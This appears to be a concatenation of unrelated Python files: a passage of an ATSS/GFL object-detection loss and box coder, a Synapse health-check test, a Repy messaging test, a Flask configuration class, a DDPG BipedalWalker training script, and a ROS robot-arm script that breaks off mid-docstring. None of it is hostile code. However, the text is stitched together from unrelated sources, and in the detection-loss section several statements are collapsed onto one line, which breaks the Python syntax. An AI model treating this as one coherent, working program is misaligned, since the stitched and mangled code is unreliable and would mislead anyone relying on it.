                    expanded_object_sizes_of_interest = torch.cat(expanded_object_sizes_of_interest, dim=0)
                    points = torch.cat(points, dim=0)

                    xs, ys = points[:, 0], points[:, 1]
                    l = xs[:, None] - bboxes_per_im[:, 0][None]
                    t = ys[:, None] - bboxes_per_im[:, 1][None]
                    r = bboxes_per_im[:, 2][None] - xs[:, None]
                    b = bboxes_per_im[:, 3][None] - ys[:, None]
                    reg_targets_per_im = torch.stack([l, t, r, b], dim=2)

                    is_in_boxes = reg_targets_per_im.min(dim=2)[0] > 0.01

                    max_reg_targets_per_im = reg_targets_per_im.max(dim=2)[0]
                    is_cared_in_the_level = \
                        (max_reg_targets_per_im >= expanded_object_sizes_of_interest[:, [0]]) & \
                        (max_reg_targets_per_im <= expanded_object_sizes_of_interest[:, [1]])

                    locations_to_gt_area = area_per_im[None].repeat(len(points), 1)
                    locations_to_gt_area[is_in_boxes == 0] = INF
                    locations_to_gt_area[is_cared_in_the_level == 0] = INF
                    # Ambiguous locations go to the smallest-area gt.
                    locations_to_min_area, locations_to_gt_inds = locations_to_gt_area.min(dim=1)

                    cls_labels_per_im = labels_per_im[locations_to_gt_inds]
                    cls_labels_per_im[locations_to_min_area == INF] = self.num_classes
                    matched_gts = bboxes_per_im[locations_to_gt_inds]
                elif self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'ATSS':
                    num_anchors_per_loc = len(self.cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS[0]) \
                                          * len(self.cfg.MODEL.ANCHOR_GENERATOR.SIZES[0])
                    # TODO deal with num gt is 0
                    num_anchors_per_level = [len(anchors_per_level) for anchors_per_level in anchors]
                    ious = pairwise_iou(anchors_all_level, bboxes_per_im)

                    gt_cx = (bboxes_per_im.tensor[:, 2] + bboxes_per_im.tensor[:, 0]) / 2.0
                    gt_cy = (bboxes_per_im.tensor[:, 3] + bboxes_per_im.tensor[:, 1]) / 2.0
                    gt_points = torch.stack((gt_cx, gt_cy), dim=1)

                    anchors_cx_per_im = (anchors_all_level.tensor[:, 2] + anchors_all_level.tensor[:, 0]) / 2.0
                    anchors_cy_per_im = (anchors_all_level.tensor[:, 3] + anchors_all_level.tensor[:, 1]) / 2.0
                    anchor_points = torch.stack((anchors_cx_per_im, anchors_cy_per_im), dim=1)

                    distances = (anchor_points[:, None, :] - gt_points[None, :, :]).pow(2).sum(-1).sqrt()

                    # Selecting candidates based on the center distance between anchor box and object
                    candidate_idxs = []
                    star_idx = 0
                    for level, anchors_per_level in enumerate(anchors):
                        end_idx = star_idx + num_anchors_per_level[level]
                        distances_per_level = distances[star_idx:end_idx, :]
                        topk = min(self.cfg.MODEL.ATSS.TOPK * num_anchors_per_loc, num_anchors_per_level[level])
                        _, topk_idxs_per_level = distances_per_level.topk(topk, dim=0, largest=False)
                        candidate_idxs.append(topk_idxs_per_level + star_idx)
                        star_idx = end_idx
                    candidate_idxs = torch.cat(candidate_idxs, dim=0)

                    # Using the sum of mean and standard deviation as the IoU threshold to select final positive samples
                    candidate_ious = ious[candidate_idxs, torch.arange(num_gt)]
                    iou_mean_per_gt = candidate_ious.mean(0)
                    iou_std_per_gt = candidate_ious.std(0)
                    iou_thresh_per_gt = iou_mean_per_gt + iou_std_per_gt
                    is_pos = candidate_ious >= iou_thresh_per_gt[None, :]

                    # Limiting the final positive samples’ center to object
                    anchor_num = anchors_cx_per_im.shape[0]
                    for ng in range(num_gt):
                        # Offset indices so each gt column addresses a
                        # distinct slice of the flattened (gt, anchor) grid.
                        candidate_idxs[:, ng] += ng * anchor_num
                    e_anchors_cx = anchors_cx_per_im.view(1, -1).expand(num_gt, anchor_num).contiguous().view(-1)
                    e_anchors_cy = anchors_cy_per_im.view(1, -1).expand(num_gt, anchor_num).contiguous().view(-1)
                    candidate_idxs = candidate_idxs.view(-1)
                    l = e_anchors_cx[candidate_idxs].view(-1, num_gt) - bboxes_per_im.tensor[:, 0]
                    t = e_anchors_cy[candidate_idxs].view(-1, num_gt) - bboxes_per_im.tensor[:, 1]
                    r = bboxes_per_im.tensor[:, 2] - e_anchors_cx[candidate_idxs].view(-1, num_gt)
                    b = bboxes_per_im.tensor[:, 3] - e_anchors_cy[candidate_idxs].view(-1, num_gt)
                    is_in_gts = torch.stack([l, t, r, b], dim=1).min(dim=1)[0] > 0.01
                    is_pos = is_pos & is_in_gts

                    # if an anchor box is assigned to multiple gts, the one with the highest IoU will be selected.
                    ious_inf = torch.full_like(ious, -INF).t().contiguous().view(-1)
                    index = candidate_idxs.view(-1)[is_pos.view(-1)]
                    ious_inf[index] = ious.t().contiguous().view(-1)[index]
                    ious_inf = ious_inf.view(num_gt, -1).t()

                    anchors_to_gt_values, anchors_to_gt_indexs = ious_inf.max(dim=1)
                    cls_labels_per_im = labels_per_im[anchors_to_gt_indexs]
                    cls_labels_per_im[anchors_to_gt_values == -INF] = self.num_classes
                    matched_gts = bboxes_per_im[anchors_to_gt_indexs]
                elif self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'TOPK':
                    # NOTE(review): like the SSC branch, parts of this branch
                    # index bboxes_per_im with tensor syntax — confirm the
                    # expected box type before enabling POSITIVE_TYPE == 'TOPK'.
                    gt_cx = (bboxes_per_im[:, 2] + bboxes_per_im[:, 0]) / 2.0
                    gt_cy = (bboxes_per_im[:, 3] + bboxes_per_im[:, 1]) / 2.0
                    gt_points = torch.stack((gt_cx, gt_cy), dim=1)

                    anchors_cx_per_im = (anchors_all_level.tensor[:, 2] + anchors_all_level.tensor[:, 0]) / 2.0
                    anchors_cy_per_im = (anchors_all_level.tensor[:, 3] + anchors_all_level.tensor[:, 1]) / 2.0
                    anchor_points = torch.stack((anchors_cx_per_im, anchors_cy_per_im), dim=1)

                    # Tiny distance penalty used to break IoU ties.
                    distances = (anchor_points[:, None, :] - gt_points[None, :, :]).pow(2).sum(-1).sqrt()
                    distances = distances / distances.max() / 1000
                    ious = pairwise_iou(anchors_all_level, bboxes_per_im)

                    is_pos = ious * False  # all-False (zero) mask, same shape as ious
                    for ng in range(num_gt):
                        _, topk_idxs = (ious[:, ng] - distances[:, ng]).topk(self.cfg.MODEL.ATSS.TOPK, dim=0)
                        l = anchors_cx_per_im[topk_idxs] - bboxes_per_im[ng, 0]
                        t = anchors_cy_per_im[topk_idxs] - bboxes_per_im[ng, 1]
                        r = bboxes_per_im[ng, 2] - anchors_cx_per_im[topk_idxs]
                        b = bboxes_per_im[ng, 3] - anchors_cy_per_im[topk_idxs]
                        is_in_gt = torch.stack([l, t, r, b], dim=1).min(dim=1)[0] > 0.01
                        is_pos[topk_idxs[is_in_gt == 1], ng] = True
                    ious[is_pos == 0] = -INF
                    anchors_to_gt_values, anchors_to_gt_indexs = ious.max(dim=1)

                    cls_labels_per_im = labels_per_im[anchors_to_gt_indexs]
                    cls_labels_per_im[anchors_to_gt_values == -INF] = self.num_classes
                    matched_gts = bboxes_per_im[anchors_to_gt_indexs]
                elif self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'IoU':
                    # Classic IoU-threshold matching via self.matcher.
                    # NOTE(review): uses copy_with_fields/get_field (maskrcnn-
                    # benchmark BoxList API) — likely legacy; verify before use.
                    match_quality_matrix = pairwise_iou(bboxes_per_im, anchors_all_level)
                    matched_idxs = self.matcher(match_quality_matrix)
                    targets_per_im = targets_per_im.copy_with_fields(['labels'])
                    matched_targets = targets_per_im[matched_idxs.clamp(min=0)]
                    cls_labels_per_im = matched_targets.get_field("labels")
                    cls_labels_per_im = cls_labels_per_im.to(dtype=torch.float32)

                    # Background (negative examples)
                    bg_indices = matched_idxs == Matcher.BELOW_LOW_THRESHOLD
                    cls_labels_per_im[bg_indices] = 0

                    # discard indices that are between thresholds
                    inds_to_discard = matched_idxs == Matcher.BETWEEN_THRESHOLDS
                    cls_labels_per_im[inds_to_discard] = -1

                    matched_gts = matched_targets.bbox

                    # Limiting positive samples’ center to object
                    # in order to filter out poor positives and use the centerness branch
                    pos_idxs = torch.nonzero(cls_labels_per_im > 0).squeeze(1)
                    pos_anchors_cx = (anchors_all_level.tensor[pos_idxs, 2] + anchors_all_level.tensor[pos_idxs, 0]) / 2.0
                    pos_anchors_cy = (anchors_all_level.tensor[pos_idxs, 3] + anchors_all_level.tensor[pos_idxs, 1]) / 2.0
                    l = pos_anchors_cx - matched_gts[pos_idxs, 0]
                    t = pos_anchors_cy - matched_gts[pos_idxs, 1]
                    r = matched_gts[pos_idxs, 2] - pos_anchors_cx
                    b = matched_gts[pos_idxs, 3] - pos_anchors_cy
                    is_in_gts = torch.stack([l, t, r, b], dim=1).min(dim=1)[0] > 0.01
                    cls_labels_per_im[pos_idxs[is_in_gts == 0]] = -1
                else:
                    raise NotImplementedError

                reg_targets_per_im = self.box_coder.encode(matched_gts.tensor, anchors_all_level.tensor)
            else:
                # no gt instance
                # all negative
                reg_targets_per_im = torch.zeros_like(anchors_all_level.tensor)
                cls_labels_per_im = torch.zeros(
                    len(anchors_all_level.tensor), dtype=torch.long, device=anchors_all_level.device
                ) + self.num_classes

            cls_labels.append(cls_labels_per_im)
            reg_targets.append(reg_targets_per_im)

        return cls_labels, reg_targets

    def compute_centerness_targets(self, reg_targets, anchors):
        """FCOS-style centerness of each anchor center inside its matched gt."""
        gts = self.box_coder.decode(reg_targets, anchors)
        anchors_cx = (anchors[:, 2] + anchors[:, 0]) / 2
        anchors_cy = (anchors[:, 3] + anchors[:, 1]) / 2
        l = anchors_cx - gts[:, 0]
        t = anchors_cy - gts[:, 1]
        r = gts[:, 2] - anchors_cx
        b = gts[:, 3] - anchors_cy
        left_right = torch.stack([l, r], dim=1)
        top_bottom = torch.stack([t, b], dim=1)
        centerness = torch.sqrt((left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0]) * \
                                (top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0]))
        assert not torch.isnan(centerness).any()
        return centerness

    def compute_iou_score(self, reg_preds, reg_targets, anchors):
        """Per-anchor IoU between decoded predictions and decoded targets."""
        gts = self.box_coder.decode(reg_targets, anchors)
        preds = self.box_coder.decode(reg_preds, anchors)
        gts = Boxes(gts)
        preds = Boxes(preds)
        return matched_boxlist_iou(preds, gts)

    def __call__(self, box_cls, box_regression, gt_instances, anchors):
        # Loss entry point; continues beyond this chunk.
        labels, reg_targets = self.prepare_targets(gt_instances, anchors)

        N = len(labels)
        box_cls_flatten, box_regression_flatten = concat_box_prediction_layers(box_cls, box_regression)

        labels_flatten = torch.cat(labels, dim=0)
        reg_targets_flatten = torch.cat(reg_targets, dim=0)
        # Anchors are shared across images, so tile them N (batch) times.
        anchors_flatten = torch.cat([Boxes.cat(anchors).tensor for _ in range(N)], dim=0)

        pos_inds = torch.nonzero(labels_flatten != self.num_classes).squeeze(1)

        # Normalize by the average number of positives across GPUs.
        num_gpus = get_num_gpus()
        total_num_pos = reduce_sum(pos_inds.new_tensor([pos_inds.numel()])).item()
        num_pos_avg_per_gpu = max(total_num_pos / float(num_gpus), 1.0)

        # one hot label for focal loss
        class_target = torch.zeros_like(box_cls_flatten)
        class_target[pos_inds, labels_flatten[pos_inds]] = 1

        # cls_loss = sigmoid_focal_loss_jit(
        #     box_cls_flatten,
        #     class_target,
        #     alpha=self.focal_loss_alpha,
        #     gamma=self.focal_loss_gamma,
        #     reduction="sum"
        # ) / num_pos_avg_per_gpu

        box_regression_flatten = box_regression_flatten[pos_inds]
reg_targets_flatten = reg_targets_flatten[pos_inds] anchors_flatten = anchors_flatten[pos_inds] centerness_targets = self.compute_centerness_targets(reg_targets_flatten, anchors_flatten) sum_centerness_targets_avg_per_gpu = reduce_sum(centerness_targets.sum()).item() / float(num_gpus) # qfl score score = torch.zeros(class_target.size()[0], dtype=torch.float32, device=class_target.device) score[pos_inds] = self.compute_iou_score( box_regression_flatten.detach(), reg_targets_flatten, anchors_flatten ) cls_loss = quality_focal_loss( box_cls_flatten, class_target, score, # IoU score weight=1.0, # weight = 1.0 beta=self.focal_loss_gamma, reduction='mean', avg_factor=num_pos_avg_per_gpu, ) if pos_inds.numel() > 0: reg_loss = self.DIoULoss(box_regression_flatten, reg_targets_flatten, anchors_flatten, weight=centerness_targets) / sum_centerness_targets_avg_per_gpu else: reg_loss = box_regression_flatten.sum() return cls_loss, reg_loss * self.cfg.MODEL.ATSS.REG_LOSS_WEIGHT class ATSSPostProcessor(torch.nn.Module): def __init__( self, pre_nms_thresh, pre_nms_top_n, nms_thresh, fpn_post_nms_top_n, min_size, num_classes, box_coder, bbox_aug_enabled=False, ): super(ATSSPostProcessor, self).__init__() self.pre_nms_thresh = pre_nms_thresh self.pre_nms_top_n = pre_nms_top_n self.nms_thresh = nms_thresh self.fpn_post_nms_top_n = fpn_post_nms_top_n self.min_size = min_size self.num_classes = num_classes self.bbox_aug_enabled = bbox_aug_enabled self.box_coder = box_coder def forward_for_single_feature_map(self, box_cls, box_regression, anchors): N, _, H, W = box_cls.shape A = box_regression.size(1) // 4 C = box_cls.size(1) // A # put in the same format as anchors box_cls = permute_and_flatten(box_cls, N, A, C, H, W) box_cls = box_cls.sigmoid() box_regression = permute_and_flatten(box_regression, N, A, 4, H, W) box_regression = box_regression.reshape(N, -1, 4) candidate_inds = box_cls > self.pre_nms_thresh pre_nms_top_n = candidate_inds.view(N, -1).sum(1) pre_nms_top_n = 
pre_nms_top_n.clamp(max=self.pre_nms_top_n) results = [] for per_box_cls, per_box_regression, per_pre_nms_top_n, per_candidate_inds \ in zip(box_cls, box_regression, pre_nms_top_n, candidate_inds): per_box_cls = per_box_cls[per_candidate_inds] per_box_cls, top_k_indices = per_box_cls.topk(per_pre_nms_top_n, sorted=False) per_candidate_nonzeros = per_candidate_inds.nonzero()[top_k_indices, :] per_box_loc = per_candidate_nonzeros[:, 0] per_class = per_candidate_nonzeros[:, 1] detections = self.box_coder.decode( per_box_regression[per_box_loc, :].view(-1, 4), anchors.tensor[per_box_loc, :].view(-1, 4) ) pred_boxes = Boxes(detections) scores = torch.sqrt(per_box_cls) pred_classes = per_class results.append((pred_boxes, scores, pred_classes)) return results def forward(self, image_sizes, box_cls, box_regression, anchors): sampled_boxes = [] # anchors = list(zip(*anchors)) for _, (o, b, a) in enumerate(zip(box_cls, box_regression, anchors)): sampled_boxes.append( self.forward_for_single_feature_map(o, b, a) ) boxlists = [] for i, image_size in enumerate(image_sizes): boxlist = Instances(image_size) boxes = [] scores = [] classes = [] for j in range(len(anchors)): boxes.append(sampled_boxes[j][i][0]) scores.append(sampled_boxes[j][i][1]) classes.append(sampled_boxes[j][i][2]) boxes = Boxes.cat(boxes) boxes.clip(image_size) keep = boxes.nonempty(self.min_size) boxlist.pred_boxes = boxes[keep] boxlist.scores = torch.cat(scores, dim=0)[keep] boxlist.pred_classes = torch.cat(classes, dim=0)[keep] boxlists.append(boxlist) boxlists = self.select_over_all_levels(boxlists) return boxlists # TODO very similar to filter_results from PostProcessor # but filter_results is per image # TODO Yang: solve this issue in the future. No good solution # right now. 
    def select_over_all_levels(self, boxlists):
        """Run multiclass NMS per image and cap detections per image.

        Args:
            boxlists: one Instances per image carrying pred_boxes, scores and
                pred_classes gathered over all FPN levels.

        Returns:
            list of Instances, NMS-suppressed and truncated to the
            top-scoring ``fpn_post_nms_top_n`` detections over all classes.
        """
        num_images = len(boxlists)
        results = []
        for i in range(num_images):
            # multiclass nms
            result = ml_nms(boxlists[i], self.nms_thresh)
            number_of_detections = len(result)

            # Limit to max_per_image detections **over all classes**
            if number_of_detections > self.fpn_post_nms_top_n > 0:
                cls_scores = result.scores
                # kthvalue picks the (N - top_n + 1)-th smallest score, so
                # roughly top_n detections score >= it (ties may keep more).
                image_thresh, _ = torch.kthvalue(
                    cls_scores.cpu(),
                    number_of_detections - self.fpn_post_nms_top_n + 1
                )
                keep = cls_scores >= image_thresh.item()
                keep = torch.nonzero(keep).squeeze(1)
                result = result[keep]
            results.append(result)
        return results


class BoxCoder(object):
    """Encode ground-truth boxes into regression targets and decode
    predictions back into boxes, in one of two parameterizations chosen by
    ``cfg.MODEL.ATSS.REGRESSION_TYPE``:

    - 'POINT': FCOS-style (l, t, r, b) distances from the anchor center,
      normalized by anchor size and scaled by the base-anchor/stride ratio.
    - 'BOX': Faster R-CNN style (dx, dy, dw, dh) deltas with fixed weights
      (10, 10, 5, 5).
    """

    def __init__(self, cfg):
        self.cfg = cfg

    def encode(self, gt_boxes, anchors):
        """Return regression targets for ``gt_boxes`` w.r.t. ``anchors``
        (both Nx4 in xyxy format, row-aligned)."""
        if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT':
            TO_REMOVE = 1  # TODO remove
            anchors_w = anchors[:, 2] - anchors[:, 0] + TO_REMOVE
            anchors_h = anchors[:, 3] - anchors[:, 1] + TO_REMOVE
            anchors_cx = (anchors[:, 2] + anchors[:, 0]) / 2
            anchors_cy = (anchors[:, 3] + anchors[:, 1]) / 2
            # Ratio of base anchor size to base stride, used as a fixed scale.
            w = self.cfg.MODEL.ANCHOR_GENERATOR.SIZES[0][0] / self.cfg.MODEL.ATSS.FPN_STRIDES[0]
            l = w * (anchors_cx - gt_boxes[:, 0]) / anchors_w
            t = w * (anchors_cy - gt_boxes[:, 1]) / anchors_h
            r = w * (gt_boxes[:, 2] - anchors_cx) / anchors_w
            b = w * (gt_boxes[:, 3] - anchors_cy) / anchors_h
            targets = torch.stack([l, t, r, b], dim=1)
        elif self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'BOX':
            TO_REMOVE = 1  # TODO remove
            ex_widths = anchors[:, 2] - anchors[:, 0] + TO_REMOVE
            ex_heights = anchors[:, 3] - anchors[:, 1] + TO_REMOVE
            ex_ctr_x = (anchors[:, 2] + anchors[:, 0]) / 2
            ex_ctr_y = (anchors[:, 3] + anchors[:, 1]) / 2

            gt_widths = gt_boxes[:, 2] - gt_boxes[:, 0] + TO_REMOVE
            gt_heights = gt_boxes[:, 3] - gt_boxes[:, 1] + TO_REMOVE
            gt_ctr_x = (gt_boxes[:, 2] + gt_boxes[:, 0]) / 2
            gt_ctr_y = (gt_boxes[:, 3] + gt_boxes[:, 1]) / 2

            # Standard R-CNN delta weights.
            wx, wy, ww, wh = (10., 10., 5., 5.)
            targets_dx = wx * (gt_ctr_x - ex_ctr_x) / ex_widths
            targets_dy = wy * (gt_ctr_y - ex_ctr_y) / ex_heights
            targets_dw = ww * torch.log(gt_widths / ex_widths)
            targets_dh = wh * torch.log(gt_heights / ex_heights)
            targets = torch.stack((targets_dx, targets_dy, targets_dw, targets_dh), dim=1)

        return targets

    def decode(self, preds, anchors):
        """Inverse of :meth:`encode`: turn predicted regression values back
        into Nx4 xyxy boxes relative to ``anchors``."""
        if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT':
            TO_REMOVE = 1  # TODO remove
            anchors_w = anchors[:, 2] - anchors[:, 0] + TO_REMOVE
            anchors_h = anchors[:, 3] - anchors[:, 1] + TO_REMOVE
            anchors_cx = (anchors[:, 2] + anchors[:, 0]) / 2
            anchors_cy = (anchors[:, 3] + anchors[:, 1]) / 2
            # Same fixed scale as in encode().
            w = self.cfg.MODEL.ANCHOR_GENERATOR.SIZES[0][0] / self.cfg.MODEL.ATSS.FPN_STRIDES[0]
            x1 = anchors_cx - preds[:, 0] / w * anchors_w
            y1 = anchors_cy - preds[:, 1] / w * anchors_h
            x2 = anchors_cx + preds[:, 2] / w * anchors_w
            y2 = anchors_cy + preds[:, 3] / w * anchors_h
            pred_boxes = torch.stack([x1, y1, x2, y2], dim=1)
        elif self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'BOX':
            anchors = anchors.to(preds.dtype)
            TO_REMOVE = 1  # TODO remove
            widths = anchors[:, 2] - anchors[:, 0] + TO_REMOVE
            heights = anchors[:, 3] - anchors[:, 1] + TO_REMOVE
            ctr_x = (anchors[:, 2] + anchors[:, 0]) / 2
            ctr_y = (anchors[:, 3] + anchors[:, 1]) / 2

            wx, wy, ww, wh = (10., 10., 5., 5.)
            dx = preds[:, 0::4] / wx
            dy = preds[:, 1::4] / wy
            dw = preds[:, 2::4] / ww
            dh = preds[:, 3::4] / wh

            # Prevent sending too large values into torch.exp()
            dw = torch.clamp(dw, max=math.log(1000. / 16))
            dh = torch.clamp(dh, max=math.log(1000. / 16))

            pred_ctr_x = dx * widths[:, None] + ctr_x[:, None]
            pred_ctr_y = dy * heights[:, None] + ctr_y[:, None]
            pred_w = torch.exp(dw) * widths[:, None]
            pred_h = torch.exp(dh) * heights[:, None]

            pred_boxes = torch.zeros_like(preds)
            pred_boxes[:, 0::4] = pred_ctr_x - 0.5 * (pred_w - 1)
            pred_boxes[:, 1::4] = pred_ctr_y - 0.5 * (pred_h - 1)
            pred_boxes[:, 2::4] = pred_ctr_x + 0.5 * (pred_w - 1)
            pred_boxes[:, 3::4] = pred_ctr_y + 0.5 * (pred_h - 1)

        return pred_boxes


def get_num_gpus():
    # World size as set by the distributed launcher; 1 when not distributed.
    return int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1


def reduce_sum(tensor):
    """All-reduce (sum) ``tensor`` across processes; identity when single-GPU."""
    if get_num_gpus() <= 1:
        return tensor
    import torch.distributed as dist
    tensor = tensor.clone()
    # NOTE(review): dist.reduce_op is a deprecated alias of dist.ReduceOp in
    # newer torch releases -- confirm against the pinned torch version.
    dist.all_reduce(tensor, op=dist.reduce_op.SUM)
    return tensor


def permute_and_flatten(layer, N, A, C, H, W):
    """Reorder a (N, A*C, H, W) head output into (N, H*W*A, C)."""
    layer = layer.view(N, -1, C, H, W)
    layer = layer.permute(0, 3, 4, 1, 2)
    layer = layer.reshape(N, -1, C)
    return layer


def concat_box_prediction_layers(box_cls, box_regression):
    """Flatten and concatenate per-level head outputs into (sum_i N*H_i*W_i*A, C)
    classification logits and (..., 4) regression predictions."""
    box_cls_flattened = []
    box_regression_flattened = []
    # for each feature level, permute the outputs to make them be in the
    # same format as the labels. Note that the labels are computed for
    # all feature levels concatenated, so we keep the same representation
    # for the objectness and the box_regression
    for box_cls_per_level, box_regression_per_level in zip(
        box_cls, box_regression
    ):
        N, AxC, H, W = box_cls_per_level.shape
        Ax4 = box_regression_per_level.shape[1]
        A = Ax4 // 4
        C = AxC // A
        box_cls_per_level = permute_and_flatten(
            box_cls_per_level, N, A, C, H, W
        )
        box_cls_flattened.append(box_cls_per_level)

        box_regression_per_level = permute_and_flatten(
            box_regression_per_level, N, A, 4, H, W
        )
        box_regression_flattened.append(box_regression_per_level)
    # concatenate on the first dimension (representing the feature levels), to
    # take into account the way the labels were generated (with all feature maps
    # being concatenated as well)
    box_cls = cat(box_cls_flattened, dim=1).reshape(-1, C)
    box_regression = cat(box_regression_flattened, dim=1).reshape(-1, 4)
    return box_cls, box_regression


# def make_anchor_generator_atss(config):
#     anchor_sizes = config.MODEL.ATSS.ANCHOR_SIZES
#     aspect_ratios = config.MODEL.ATSS.ASPECT_RATIOS
#     anchor_strides = config.MODEL.ATSS.ANCHOR_STRIDES
#     straddle_thresh = config.MODEL.ATSS.STRADDLE_THRESH
#     octave = config.MODEL.ATSS.OCTAVE
#     scales_per_octave = config.MODEL.ATSS.SCALES_PER_OCTAVE
#
#     assert len(anchor_strides) == len(anchor_sizes), "Only support FPN now"
#     new_anchor_sizes = []
#     for size in anchor_sizes:
#         per_layer_anchor_sizes = []
#         for scale_per_octave in range(scales_per_octave):
#             octave_scale = octave ** (scale_per_octave / float(scales_per_octave))
#             per_layer_anchor_sizes.append(octave_scale * size)
#         new_anchor_sizes.append(tuple(per_layer_anchor_sizes))
#
#     anchor_generator = DefaultAnchorGenerator(
#         {
#             "sizes": new_anchor_sizes,
#             "aspect_ratios": aspect_ratios,
#             "strides": anchor_strides,
#             "offset": 0.0
#         }
#     )
#     return anchor_generator
nilq/baby-python
python
# -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.rest.health import HealthResource

from tests import unittest


class HealthCheckTests(unittest.HomeserverTestCase):
    """Sanity checks for the unauthenticated /health endpoint."""

    def create_test_resource(self):
        """Serve a HealthResource in place of the default JsonResource."""
        return HealthResource()

    def test_health(self):
        """A GET on /health responds 200 with a literal b"OK" body."""
        request, channel = self.make_request("GET", "/health", shorthand=False)

        body = channel.result["body"]
        self.assertEqual(request.code, 200)
        self.assertEqual(body, b"OK")
nilq/baby-python
python
#pragma repy # This test tries to do recvmess / stopcomm in a loop def foo(ip,port,mess, ch): print ip,port,mess,ch if callfunc == 'initialize': for x in xrange(0,10): ch = recvmess(getmyip(),<messport>,foo) sleep(.1) stopcomm(ch) sleep(.1)
nilq/baby-python
python
import os
from datetime import timedelta


class Config(object):
    """Base Flask-style configuration, populated from environment variables.

    Every bare ``os.environ[...]`` access raises KeyError at import time when
    the variable is missing, so a misconfigured deployment fails fast.
    """
    DEBUG = False
    # Downstream service endpoints and credentials.
    AUTHENTICATED_SEARCH_API = os.environ['AUTHENTICATED_SEARCH_API']
    SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
    CASES_URL = os.environ['CASES_URL']
    MATCHING_URL = os.environ['MATCHING_URL']
    OWNERSHIP_URL = os.environ['OWNERSHIP_URL']
    OS_API_KEY = os.environ['OS_API_KEY']
    INTRODUCTION_URL = os.environ['INTRODUCTION_URL']
    HISTORIAN_URL = os.environ['HISTORIAN_URL']
    REDIS_URL = os.environ['REDIS_URL']
    # Session lifetime is configured in minutes.
    PERMANENT_SESSION_LIFETIME = timedelta(minutes=int(os.environ['PERMANENT_SESSION_LIFETIME']))
    WTF_CSRF_ENABLED = True
    VIEW_COUNT = int(os.environ['VIEW_COUNT'])
    # NOTE(review): raw env string -- even the value "False" is truthy here,
    # while TestConfig overrides it with a real bool. Confirm how call sites
    # test this flag before relying on it.
    VIEW_COUNT_ENABLED = os.environ['VIEW_COUNT_ENABLED']
    SECRET_KEY = os.environ['SECRET_KEY']
    # Password salt deliberately reuses the secret key.
    SECURITY_PASSWORD_SALT = SECRET_KEY
    SECURITY_PASSWORD_HASH = os.environ['SECURITY_PASSWORD_HASH']

    # optional and only needed on heroku so get
    # safely
    BASIC_AUTH_USERNAME = os.environ.get('BASIC_AUTH_USERNAME')
    BASIC_AUTH_PASSWORD = os.environ.get('BASIC_AUTH_PASSWORD')


class DevelopmentConfig(Config):
    """Local development: debug on, CSRF protection off."""
    DEBUG = True
    WTF_CSRF_ENABLED = False


class TestConfig(DevelopmentConfig):
    """Test runs: testing mode on, view counting disabled."""
    TESTING = True
    VIEW_COUNT_ENABLED = False
nilq/baby-python
python
"""Train a DDPG agent on the gym BipedalWalker-v2 environment.

Restores a previously saved agent, trains for up to ``n_episodes`` episodes
while tracking a 100-episode moving average of the score, checkpoints every
100 episodes, and finally plots the per-episode score curve.

Fix: removed the duplicate plain ``import tensorflow`` (the module is used
only via the ``tf`` alias) and the unused ``import random``.
"""
import gym
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
import utils.utils as utils
import tensorflow as tf
from ddpg_tf import DDPG

env = gym.make('BipedalWalker-v2')
env.seed(0)  # fixed seed for reproducible rollouts

sess = tf.Session()
agent = DDPG('ddpg', utils.load_args(), sess=sess)
agent.restore()  # resume from the latest saved checkpoint


def ddpg(n_episodes=10000, max_t=1000):
    """Run the training loop.

    Args:
        n_episodes: maximum number of episodes to train for.
        max_t: maximum environment steps per episode.

    Returns:
        List of per-episode scores (sum of rewards).
    """
    scores_deque = deque(maxlen=100)  # window for the moving average
    scores = []
    for i_episode in range(1, n_episodes+1):
        state = env.reset()
        score = 0
        for t in range(max_t):
            action = agent.act(state)
            next_state, reward, done, _ = env.step(action)
            # Store the transition (the agent learns from its replay buffer).
            agent.step(state, action, reward, next_state, done)
            state = next_state
            score += reward
            if done:
                break
        scores_deque.append(score)
        scores.append(score)
        average_score = np.mean(scores_deque)
        print('\rEpisode {}\tAverage Score: {:.2f}\tScore: {:.2f}'.format(i_episode, average_score, score), end="")
        if i_episode % 100 == 0:
            print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, average_score))
            agent.save()  # periodic checkpoint
    return scores


scores = ddpg()

fig = plt.figure()
ax = fig.add_subplot(111)
plt.plot(np.arange(1, len(scores)+1), scores)
plt.ylabel('Score')
plt.xlabel('Episode #')
plt.show()
nilq/baby-python
python
"""Publish joint position commands for an ABB IRB120 via ROS.

Fix: ``rosact.write`` contained unresolved merge-conflict residue -- an
always-taken ``while True`` loop that called the undefined ``traj_pnt`` and
``pts`` and referenced ``time`` (the module is imported as ``t``), so the
method crashed with NameError before the working code could run. The dead
branch has been removed and the functional branch kept.
"""
from factory import robot
import rospy
from std_msgs.msg import Float64
from std_msgs.msg import Bool
from geometry_msgs.msg import Point
import time as t
import math as m

t0 = t.time()
Robot = None  # module-level handle; note main() shadows it with a local


class rosact(object):
    """Thin wrapper around the 6 joint position-controller publishers."""

    def __init__(self):
        rospy.init_node('act')
        # One position-command publisher per joint: index 0 -> joint_1 ... 5 -> joint_6.
        self.pubs = []
        for joint in range(1, 7):
            self.pubs.append(rospy.Publisher(
                '/irb120/joint_%d_position_controller/command' % joint,
                Float64, queue_size=10))
        rospy.sleep(1)  # give the publishers time to register with the master

    def write(self, rob, pos=None):
        """Solve IK for a fixed Cartesian target and publish one command per joint.

        Args:
            rob: kinematic model exposing ``iterIK([x, y, z])``.
            pos: unused placeholder kept for interface compatibility; it is
